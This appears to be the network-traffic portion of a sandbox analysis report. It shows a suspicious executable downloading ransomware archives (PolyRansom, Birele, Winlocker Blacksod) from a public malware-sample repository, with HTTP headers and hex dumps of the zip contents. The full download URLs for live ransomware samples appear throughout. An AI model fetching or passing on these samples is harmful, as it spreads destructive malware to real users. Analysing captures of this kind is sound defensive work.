                                                                                                        X-GitHub-Request-Id: 0800:540D:F52AAF:104AFB9:63359348
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:26 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6958-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455526.206995,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 62de0257df36563cfcc032223c99c6a7e0ea60c5
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:26 GMT
                                                                                                        Source-Age: 30
                                                                                                        2022-09-29 12:45:26 UTC2234INData Raw: 50 4b 03 04 14 00 01 00 08 00 d7 0a 79 45 34 43 fb 93 c7 09 02 00 00 70 03 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 6f 6c 79 52 61 6e 73 6f 6d 2e 65 78 65 58 ef 05 c0 b6 8a bd fa 25 51 13 b9 f0 ae cd 11 df 91 dc 43 09 90 1b b5 9d 5d 56 12 5c 94 0e ff 03 d7 23 cf 58 8f c9 fc 7a ca d0 4b c3 a3 27 ee 75 4b 94 c3 a8 37 cb c7 96 47 64 25 16 5f 75 8b 47 35 1c ec 30 cf b0 1c 29 8d 4e 7a b2 68 9f 1a b9 f2 b5 cf 25 fc 5f cb e5 54 45 19 d1 c3 7f 29 0e 9a 48 e3 c3 db bf d1 58 a6 62 90 28 e7 25 5d 5d 44 e2 fd ca 22 88 a8 30 1b 7c 35 9b ac 29 b6 47 ea 2d 68 27 71 fa 3a dc b6 a1 8c 7d 62 f8 31 e2 cb 11 3a ce b9 5e a4 0e 64 ef 92 64 9d 74 fb c5 0a 39 83 f1 e4 aa 69 59 2b df 89 eb ae a0 07 94 80 66 94 95 09 21 bb 66 6e af 73 6b ff d8 aa 55 47 28 e9 d7 86 82 af
                                                                                                        Data Ascii: PKyE4CpEndermanch@PolyRansom.exeX%QC]V\#XzK'uK7Gd%_uG50)Nzh%_TE)HXb(%]]D"0|5)G-h'q:}b1:^ddt9iY+f!fnskUG(
                                                                                                        2022-09-29 12:45:26 UTC2250INData Raw: c9 73 eb 77 de e0 00 71 96 10 d4 59 5f 25 fa 9e 8b 14 ba 8a f2 e5 2c 5a 66 1e d1 cb 2c 48 2b e1 ea 8e 2a 91 e3 30 d8 2d f6 91 51 31 fd 51 95 35 ee 53 8b 31 9c b4 ce 00 f5 2d b5 6e 56 e4 07 9e 47 c9 0f b3 03 e2 58 96 8c 55 9d ce ec f0 8f d4 8c a5 9e 22 1b 39 ff 1f 8f 55 8e 56 e1 cb 34 3f 93 0f 36 93 d1 69 6d e2 98 ba 27 c0 60 ff b6 22 78 c5 4c de ce 8b a2 d0 25 ae 94 47 d5 dd 3b 88 cd 90 16 de 3a 28 e3 46 a9 b5 6c 4b eb 25 6f 7d f9 65 5c b0 b9 f8 18 25 88 b1 79 be 25 69 67 50 98 e7 23 07 db f4 70 e3 1e a4 59 b1 37 18 56 f8 d8 05 7b 7a eb 73 66 8d 79 ab 0d 50 88 71 d5 03 82 aa 0e be 04 04 d5 ac 84 24 71 eb 5d ae 36 9b f4 db 9f dc 22 8b 4f c6 8d 26 e1 1c 65 43 e9 93 f6 85 99 a6 bd 52 2e d0 73 72 79 31 f8 64 4d 4c 6d 4c fb b0 06 47 8d 02 ea ba 78 ae 48 bd 95
                                                                                                        Data Ascii: swqY_%,Zf,H+*0-Q1Q5S1-nVGXU"9UV4?6im'`"xL%G;:(FlK%o}e\%y%igP#pY7V{zsfyPq$q]6"O&eCR.sry1dMLmLGxH
                                                                                                        2022-09-29 12:45:26 UTC2266INData Raw: a5 ec fb a5 8e 16 fb 89 06 09 fa 60 73 25 a0 77 4e 75 ef e1 a3 41 67 47 4c 3f b0 97 f2 a0 97 95 0d 28 c8 9b 6b 26 51 77 23 b3 5d 29 0b 98 42 47 69 d2 d7 97 40 7b 90 f4 c4 d6 59 c7 90 f5 d5 8e c8 f2 2a 9f dd 45 68 42 5b 6e 72 be f6 55 68 1e 47 c6 8d 0b b3 b2 7d 07 2b 98 26 49 4e 34 2b d2 e9 ca 57 24 fd 88 13 ad 54 7c bb 52 7b 90 98 52 94 00 52 e3 60 78 6f 9c 3e b7 aa b2 54 c0 f1 97 02 5e e1 b0 2f 8a 72 26 dc 2e f0 71 1f 8a db ee 66 0d 9e 7e f0 5d 81 cd 54 ff 83 69 2e 5a 76 29 f0 b0 af a7 42 2b d1 a1 03 b8 bf 23 8d 56 20 bd 7c f5 30 e6 07 ff c1 b3 57 79 03 a0 3c 95 18 bf 71 1a 0e 41 75 e8 59 bd c3 0b de 4c 89 88 ef b7 56 59 bb 2c 3e 6d ad 0d a8 ef 4c 8e e5 aa 9b 81 9c c0 2d ec 27 27 26 0f fc 62 c0 99 42 f3 69 68 fb 7e a8 f8 cc ff dd 6a 6e 01 0b 37 d4 95 0c
                                                                                                        Data Ascii: `s%wNuAgGL?(k&Qw#])BGi@{Y*EhB[nrUhG}+&IN4+W$T|R{RR`xo>T^/r&.qf~]Ti.Zv)B+#V |0Wy<qAuYLVY,>mL-''&bBih~jn7
                                                                                                        2022-09-29 12:45:26 UTC2282INData Raw: 96 c2 a2 a1 0b 7b 6b e4 ce 45 3a 2d db 30 7c 59 cc 3e 9c 80 ca f6 8f 1a f5 47 34 0a 8a ee 95 21 b2 6e d9 65 45 d5 aa c6 a7 f5 f1 c1 7a 70 4e aa c4 86 9b a4 72 f8 02 ba 81 a6 d1 b2 b7 07 ca d5 f8 3a e4 5d 13 05 b3 7e 32 e7 c6 9f 0c b3 a5 d0 bf bc 1b 24 35 db c6 61 b1 d6 0e 51 75 14 b8 79 61 72 32 e3 a4 2b 2d a2 55 a1 c4 df df 47 8f 44 49 63 11 b5 38 d4 a0 dd 7d 83 e8 e2 ee 7b 38 46 71 67 20 4d 6e 5f 72 fc 8b f5 86 42 f6 25 a7 bb a6 b1 ef e1 70 7c ba f8 f4 3b 30 2e 8e 99 f0 87 af dc 9c 3f 5f 96 13 1d 6e 66 f3 12 59 18 a9 aa d4 60 f0 63 ac 45 8c 8c b5 60 60 54 90 e8 f2 24 de 6d 8f 77 dd 48 7f ed 38 39 94 c8 82 57 16 29 7d c1 87 25 da b6 bd 8e 9f c1 cd e9 69 d2 11 4c 9d 57 14 ff e9 5d 59 39 5e 4e de fa b9 69 50 b4 74 3e 48 a1 3b 7e 7b 84 94 44 de e1 48 f2 f4
                                                                                                        Data Ascii: {kE:-0|Y>G4!neEzpNr:]~2$5aQuyar2+-UGDIc8}{8Fqg Mn_rB%p|;0.?_nfY`cE``T$mwH89W)}%iLW]Y9^NiPt>H;~{DH
                                                                                                        2022-09-29 12:45:26 UTC2298INData Raw: ed 03 44 3f 7a 8c 6e 24 c8 b6 b3 b8 3f e9 08 a0 23 bf c2 a6 3a 5f 2e cd 14 f3 ff c8 25 71 12 44 98 d8 33 81 e2 d0 22 cc ec 5d 2e 15 13 fc 28 74 9e 24 f3 5a d2 41 79 db 26 52 d1 bb 1c d7 41 e1 0c 13 f9 c3 a5 02 42 3a e3 48 63 bf c1 c2 40 d4 42 fd b4 95 a2 9d 22 8b 9a b9 d0 2c a3 f3 a1 e8 0d fb fa 18 e9 6c 92 13 4f 88 e2 c3 41 41 b9 6a c8 a9 64 49 5b 89 2c 81 57 61 b5 66 5c 86 62 68 34 b8 57 c2 97 df 34 f0 ec 29 bf a3 26 df 02 aa 71 84 61 e5 13 e0 aa 3e 6b d7 44 19 c5 54 ce 36 52 cf 68 99 82 0f 4b 26 9a 35 93 b1 1f 4f 9f bd 33 74 df 74 f0 64 59 80 91 ec 71 84 8a 3f 20 09 f8 c5 8b fe c6 f5 6a 28 91 40 3e 1c d6 30 73 a1 b6 9a 65 63 07 0c e0 ef 54 d2 61 f7 c3 47 6f 7b 08 6f 5c f4 be 77 af 54 46 ff 33 a6 f0 b9 07 75 3d 2f b2 20 48 7d eb f3 25 88 82 36 1a 58 d6
                                                                                                        Data Ascii: D?zn$?#:_.%qD3"].(t$ZAy&RAB:Hc@B",lOAAjdI[,Waf\bh4W4)&qa>kDT6RhK&5O3ttdYq? j(@>0secTaGo{o\wTF3u=/ H}%6X
                                                                                                        2022-09-29 12:45:26 UTC2314INData Raw: 4f f3 57 32 57 2b 7d 8a 42 cf 1d b7 3f c2 61 ae 89 d6 9e dd bc b4 e3 3c b5 9a 5c 6a 3f 67 ea 19 23 6e 6d 11 13 71 71 bc ab b9 89 cf 5b 76 7b b0 c8 85 a0 de 27 97 99 9f f5 03 2a 8a 98 1a 0a cd 75 4a c4 df 9b ab d5 2a 73 f1 28 55 0f 20 e1 0e c4 82 97 5a 49 77 dd 3c 3d 9f 27 6e e1 3b 62 56 e5 d0 bd c2 4b d5 d3 cb a8 4c d0 0e ec dd 88 b8 49 c2 9a 14 75 64 32 2d 16 87 aa a7 db 2c 2f f1 eb 7c 13 1a c2 83 ba 32 5c b0 5a 47 c6 a5 b7 e2 95 9d db 5c ed 9a 57 56 46 39 55 0c b6 9b c2 ab ec 90 2d 60 ab 0d ab da ed 4c 0b 77 49 e9 29 72 94 9e 07 d9 96 f6 66 19 a4 38 2f 9a d2 ad 39 63 c8 79 9d bb 85 bd e5 ce d8 ff 2b cd 5b 3d 59 8b 79 02 c2 e5 89 38 e6 e6 14 c5 c4 af 66 4a 93 24 94 56 80 f8 06 72 75 08 ee 5d 59 75 b4 fc 09 33 5a d9 5a ff 83 8b 6d 4f 75 2b ff e3 fb a1 8f
                                                                                                        Data Ascii: OW2W+}B?a<\j?g#nmqq[v{'*uJ*s(U ZIw<='n;bVKLIud2-,/|2\ZG\WVF9U-`LwI)rf8/9cy+[=Yy8fJ$Vru]Yu3ZZmOu+
                                                                                                        2022-09-29 12:45:26 UTC2330INData Raw: 5f 34 f4 90 ee 90 7a fe 6d f7 93 4e 47 6d 94 c8 bc 00 92 07 4d 93 44 4b 2e 99 d6 bc fc df 87 44 39 65 7b df e8 4c 8d 9c c7 5f 43 8f 5c 22 5d 51 9c e2 15 cf 8b 2b 32 13 6b 1a a6 9f 30 78 ca 5e e2 f7 e1 bf 03 da 60 d5 fa 9a cc 18 bd 32 d3 ba f0 6d 0e 81 01 42 5a 29 6e 00 67 3c df 95 ee 33 91 38 95 3b 1e 6f cb 1a bb 31 89 7e 7c 2b 3c 96 2c cc e0 41 e4 41 c1 65 03 14 0b 72 50 d1 2a 79 b1 25 92 30 83 c2 28 c4 e9 9d 0b 42 e0 4b f1 9c 3a 34 11 fe 53 98 e2 55 44 79 25 8a 33 4a 52 6d 04 94 03 de 48 ee e6 d3 7d b4 36 94 14 95 ab 9c 99 1d 58 81 61 6d f7 85 00 f1 aa 18 b4 fe f9 17 58 47 89 50 7f f6 99 e8 40 2a ae 4b 49 d2 6e 90 4f 9f d0 cf 02 df 4d 5c 1e 9c 27 fc e1 59 77 4d d1 d1 c5 10 2a c5 8a 49 bb d1 12 8b 4c ae 67 42 db 43 2b 4c c1 3a f6 c6 b4 5f 3f b4 91 ff c4
                                                                                                        Data Ascii: _4zmNGmMDK.D9e{L_C\"]Q+2k0x^`2mBZ)ng<38;o1~|+<,AAerP*y%0(BK:4SUDy%3JRmH}6XamXGP@*KInOM\'YwM*ILgBC+L:_?
                                                                                                        2022-09-29 12:45:26 UTC2346INData Raw: a5 d0 f6 94 2d ec 3e a5 37 76 4d d6 a3 9e 45 76 8b 74 c9 f1 b3 4a db 0a dc d2 87 cd a3 71 90 e7 27 7a 64 33 9e 46 57 69 de 72 ca 0d 57 66 55 a6 92 00 e3 a1 06 f2 e0 dd c8 e5 18 1c c5 00 d6 40 da 60 c5 00 f5 78 ed e7 3a d1 70 ae fd 58 50 6c 2f 71 57 87 08 12 c1 8c 24 0c 1b 98 e8 79 84 d6 88 66 dd 69 fe e4 9c 71 24 b1 b3 ec 1d 14 fc 27 0f c0 c5 ba d6 6f 15 30 b6 14 f1 c9 15 ec bd 0a a9 8b dc a0 e6 d7 db 43 4a 63 e0 af ee 72 44 8c 6b ae 56 16 22 0f cc 5c 9e e9 fd 52 ca 88 3e 66 fb 4e 68 f5 16 24 99 ae ba 36 56 3f 3c 5d c7 12 a4 c2 84 bb f3 82 3b 8b 38 c6 a5 cc 5c 19 dc 94 a8 af 87 42 fd eb 27 da 4e 23 d7 45 94 4d 2b 70 a8 b5 82 c7 37 66 e7 0d 3d 33 d4 31 cd 23 b8 9f cc 30 ad b2 5e 7e 32 83 b0 60 a5 70 47 3e 95 1f 3a 4c a3 ef ec 53 71 22 f4 a7 35 e5 75 d4 b6
                                                                                                        Data Ascii: ->7vMEvtJq'zd3FWirWfU@`x:pXPl/qW$yfiq$'o0CJcrDkV"\R>fNh$6V?<];8\B'N#EM+p7f=31#0^~2`pG>:LSq"5u
                                                                                                        2022-09-29 12:45:26 UTC2362INData Raw: 3d 85 0d 6c 90 aa 1b ab d0 28 7f 91 59 f3 9f 88 54 23 57 cb 59 8d 08 64 d3 06 56 52 24 7b 47 7e 82 16 e3 ed d0 8b 8b 0c dd 8f 0e 88 70 69 09 d2 5e b1 ea fc 2b 94 2f c2 ba 12 db f7 70 3c e8 2a 62 ed d7 56 8c 5e 82 77 09 77 07 76 90 47 af 23 13 e8 e4 85 f0 ba 7b c7 84 af b8 30 c0 48 71 b8 6d 82 6e 01 f6 65 34 62 6d 01 ba 11 11 79 d4 ed a3 44 bd 0a 5d 67 18 fb 08 3d 71 61 1c 98 6e 39 fb df 68 ff 0c 69 9d d0 b0 cc a4 42 4c a4 22 05 43 35 6d d0 52 6f 2b cd 58 8e 4a 09 ae c9 54 9f b9 4a 2c 35 d8 66 d7 6e 99 83 a8 c8 20 31 4e 4c 0b 2c 36 c9 5b 14 8e 6e d5 ca b7 d3 41 0b 0f ac 1e 95 7c 04 b3 13 4a fc 7d 30 ad 89 0c e3 f9 21 19 5e 05 40 93 e4 79 44 5f 1e b1 e2 53 dc f7 85 06 16 69 d6 e1 02 62 66 92 dc e1 1a 6b 8d 51 c7 81 0b 49 85 71 28 32 3d e8 a1 9b 08 fc 17 e7
                                                                                                        Data Ascii: =l(YT#WYdVR${G~pi^+/p<*bV^wwvG#{0Hqmne4bmyD]g=qan9hiBL"C5mRo+XJTJ,5fn 1NL,6[nA|J}0!^@yD_SibfkQIq(2=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.449709140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:05 UTC396OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:05 UTC396INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:43:24 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Birele.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:05 UTC397INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.449743140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:35 UTC2365OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:35 UTC2365INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:13 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:35 UTC2365INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.449744185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:35 UTC2367OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:35 UTC2367INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 1654828
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "048f16ec26fac96976b1d3967107c01ab62f85a71c9ea224a0004e0d9a310bb0"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 080E:67BF:7859E0:85F3A6:63359349
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:35 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6961-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455535.136269,VS0,VE3
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: f4e81407713df9b7dc85d7840fe4225a3f17b8c3
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:35 GMT
                                                                                                        Source-Age: 38
                                                                                                        2022-09-29 12:45:35 UTC2368INData Raw: 50 4b 03 04 14 00 01 00 08 00 f3 be f1 48 70 46 04 a5 60 3f 19 00 a8 52 26 00 23 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 57 69 6e 6c 6f 63 6b 65 72 56 42 36 42 6c 61 63 6b 73 6f 64 2e 65 78 65 13 82 84 12 45 39 75 df 15 b3 b4 e2 21 6a 25 fe e2 9e 52 e9 6c c4 4d 37 be 49 97 0a e4 f2 fd eb 82 6d 18 d5 dc f8 b7 12 1f da 01 13 ab a0 f2 8f d0 d0 78 27 00 cb db a6 6f d4 d9 32 0a f0 dc 60 ea bc 46 55 7d 13 2c c3 9a eb 73 98 44 49 93 e0 7c 6a 2c b3 7a 58 78 41 93 99 06 42 b1 7f 75 47 eb a4 a1 79 e6 80 ed 12 91 76 8a 64 fa 6a 78 eb ca c2 0b 70 df 58 a4 d6 63 ef 69 89 6c 2f 21 e9 cc b1 31 b4 cb 54 d9 00 5f de 7a 30 fd 13 6f 15 0f 9f 11 13 bb 23 ca 41 c6 c0 64 41 22 da 3b 27 45 e9 8b 13 90 51 e3 7f 46 e2 bc 4a 84 7f 16 f7 35 b5 58 21 8e 7e 6c 9b dd 9e a3 99 c4 07
                                                                                                        Data Ascii: PKHpF`?R&#Endermanch@WinlockerVB6Blacksod.exeE9u!j%RlM7Imx'o2`FU},sDI|j,zXxABuGyvdjxpXcil/!1T_z0o#AdA";'EQFJ5X!~l
                                                                                                        2022-09-29 12:45:35 UTC2384INData Raw: 93 0e 8a 9d 7a 5d 41 66 e8 0c d0 8a 87 d0 c5 22 eb 81 4f c4 e6 45 13 76 43 99 57 ee c9 24 60 09 2a 38 a8 8e 6d 73 22 b5 32 d1 c2 82 53 1f e4 45 80 36 94 d6 e6 b4 3e 80 38 36 33 af 71 ea 1c 8d 3d 38 8f 15 6b 54 12 a7 dd 65 0b bb cf d4 29 6c 07 3f 71 cb 89 8c fa 9c 52 15 6e 07 76 55 9c 8b 95 81 f2 15 49 24 e5 08 f4 3b 24 26 06 7b 8c 35 92 a7 00 13 c4 fa 61 40 1c ef 2c 82 22 67 cc 7d aa b7 ba 39 c5 b2 f4 f3 d7 e5 77 2f 6e c9 7d 57 97 18 8c 3d b3 26 69 94 a4 92 77 59 59 90 ba e4 bb be f8 eb 74 6a 7d dd 8f 4f 46 d9 61 6d 60 69 a9 d0 84 e9 6d a4 63 e7 be 20 c8 84 b2 46 5a 99 df 0b b6 50 0a 37 c3 8e 25 10 2f 07 6d cb 28 09 52 94 a4 a8 6c cc 70 21 38 86 4e 3f 17 f2 1c 31 2b 96 e9 6a a8 ac 0d 3d 67 fd 61 56 3a d6 82 eb aa e6 52 80 1d 7a eb fe ef d1 34 7f 69 bd 18
                                                                                                        Data Ascii: z]Af"OEvCW$`*8ms"2SE6>863q=8kTe)l?qRnvUI$;$&{5a@,"g}9w/n}W=&iwYYtj}OFam`imc FZP7%/m(Rlp!8N?1+j=gaV:Rz4i
                                                                                                        2022-09-29 12:45:35 UTC2400INData Raw: f8 37 2a 1c b8 fe 86 c3 62 c1 fa 42 12 4b f0 ce a0 62 55 e6 02 3a f1 09 21 e1 90 90 1d fe 70 ae 20 5a 41 a7 11 00 46 6f bf bb 39 51 dd 4b 6d d7 7c d7 28 c4 54 af 60 41 25 a6 e7 fa 1a f6 32 a1 ee 98 e2 de a3 9d d9 da 7c 0e 1a 79 8a 0c 25 aa a7 7f 54 26 e2 72 36 b9 b4 30 91 0b b6 18 c6 7d c9 2b a3 74 eb 73 e6 93 a0 8f 2f 5b df fb 44 bc 35 33 ba d7 bd 77 4f 5a 10 0a f1 f3 88 09 32 39 fd 67 89 e2 ea 36 02 c4 27 f3 0d f2 ad 32 23 8d ae 3b 46 a6 0b 9a 8c 2b 55 ef b3 e9 c9 bd b6 a3 d3 db 1b 6c 76 3f f5 24 0a d4 46 b5 77 d3 6c 4f b7 af d1 cb a2 07 13 21 9e 23 9f ba e4 f8 9c 11 bd 11 da 65 7a a8 88 3b 86 dd 3f 4c 7a 93 aa 53 16 63 72 5d 1d 8a 9d 25 d7 99 f3 f5 b2 59 b0 51 d4 7b 24 ac 13 0d 54 d1 2a 68 6b b8 d5 32 c5 39 1e b5 48 0a ec ea 32 44 1d 1a 1e 5f 11 0a 22
                                                                                                        Data Ascii: 7*bBKbU:!p ZAFo9QKm|(T`A%2|y%T&r60}+ts/[D53wOZ29g6'2#;F+Ulv?$FwlO!#ez;?LzScr]%YQ{$T*hk29H2D_"
                                                                                                        2022-09-29 12:45:35 UTC2416INData Raw: 87 2f b5 2d 82 20 f5 98 f7 40 d5 a2 0c 25 a2 aa 04 7b c4 7b 58 fe 52 be 46 66 cb d4 6f a9 86 02 e7 9b d5 71 d6 6d 2b 8c 60 2c 03 92 e7 a7 6c 43 9f eb 87 59 65 fb 0f ab bc c4 67 c1 6e 8a e5 a5 ab 84 92 0d f1 62 ac 56 e5 3b 46 6d 4d f1 d7 df 7e 49 81 86 3e e0 18 f4 76 8f d0 4e 1b 6f af 69 25 07 95 b3 05 95 4a 44 d4 86 5f 44 70 9a 99 79 0d f3 ad 9e 2e 0d 9f c7 53 01 94 cc a8 03 2e c3 e0 91 59 3d 3a 72 84 3f f4 62 85 a5 79 f0 82 38 64 77 fa b9 f7 3b 11 37 d9 a3 42 e6 10 99 48 90 bf f8 85 04 e5 12 9e bc fe d2 21 5e ab 8b 7c 16 6f 2e dd ec 68 66 bd 15 4c 8f 1f d9 9e 8d 22 83 23 b3 24 03 a9 be 82 2b 1b f5 d5 a6 cb 3c ec 0e 25 76 7a ac de a9 cf 73 43 7d 0c eb 6c 80 38 c0 d2 3e b2 0d 3c 1d a5 cc 2a d1 98 77 ef aa 27 cc d1 8c 2d e5 7a 61 96 f5 04 af 26 45 83 b1 e0
                                                                                                        Data Ascii: /- @%{{XRFfoqm+`,lCYegnbV;FmM~I>vNoi%JD_Dpy.S.Y=:r?by8dw;7BH!^|o.hfL"#$+<%vzsC}l8><*w'-za&E
                                                                                                        2022-09-29 12:45:35 UTC2432INData Raw: 0e a7 3b 8c db 2c 21 e7 70 c4 c9 b4 17 64 2b ae e5 4b f6 34 1a af a1 9a f9 32 fe f9 8d b7 ab 44 06 61 80 8f 66 aa 59 5a 5d 6f 12 0d b1 d7 f0 68 27 e4 0d 4d fe 47 6f 3f f3 e6 32 30 a5 2a 39 79 b1 7b 2f 2a a0 04 9d a5 69 59 9d 3f ac 1e c5 48 db d0 b0 dd 95 a8 9b 47 16 e9 9a 9c 6d 88 d1 a2 91 a1 88 40 bf 93 ba 6b e5 51 6e 3f 6f 89 81 42 ac 4e 9f 37 95 3c 75 e4 89 4e eb 1d 6f c6 c6 1f fc 4d 42 58 8e b1 fd 2e be ab 73 5a 8d c4 9c 7c 68 49 0b 32 a0 1d 31 ff 81 9a 8a 1a 65 e2 20 ef 2e 3e c5 a6 e3 db 55 80 40 12 38 df 4d 7c 8b 72 a3 3d df 2c 0b 4d 63 e5 34 6f 11 2e bc 0d 2f 50 48 7e 3d 78 63 87 ee 52 27 a2 e0 34 87 b0 55 73 8b 8d d8 92 a0 2f 20 af d0 9f bc 67 c7 26 1a 3a be 4e 86 c8 ca 89 5a 63 99 06 83 04 e6 e1 11 d7 43 a2 52 6d c5 90 fe 52 42 48 59 56 0d d0 24
                                                                                                        Data Ascii: ;,!pd+K42DafYZ]oh'MGo?20*9y{/*iY?HGm@kQn?oBN7<uNoMBX.sZ|hI21e .>U@8M|r=,Mc4o./PH~=xcR'4Us/ g&:NZcCRmRBHYV$
